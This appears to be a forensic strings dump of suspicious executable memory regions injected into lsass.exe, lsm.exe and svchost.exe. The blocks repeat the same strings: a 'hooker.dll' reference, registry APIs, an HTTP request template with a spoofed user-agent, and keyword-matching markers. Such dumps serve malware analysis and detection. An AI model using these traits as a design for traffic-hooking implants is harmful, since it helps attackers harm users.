lsass.exe_468_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsass.exe_468_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsass.exe_468_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsass.exe_468_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsass.exe_468_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsass.exe_468_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsass.exe_468_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsass.exe_468_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsass.exe_468_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsass.exe_468_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsass.exe_468_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsass.exe_468_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsm.exe_476_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsm.exe_476_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsm.exe_476_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsm.exe_476_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsm.exe_476_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsm.exe_476_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsm.exe_476_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsm.exe_476_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsm.exe_476_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsm.exe_476_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsm.exe_476_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsm.exe_476_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsm.exe_476_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsm.exe_476_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_580_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_580_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_580_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_580_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_580_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_580_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_580_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_580_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_580_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_580_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_580_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_580_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_580_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_580_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_648_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_648_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_648_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_648_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_648_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_648_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
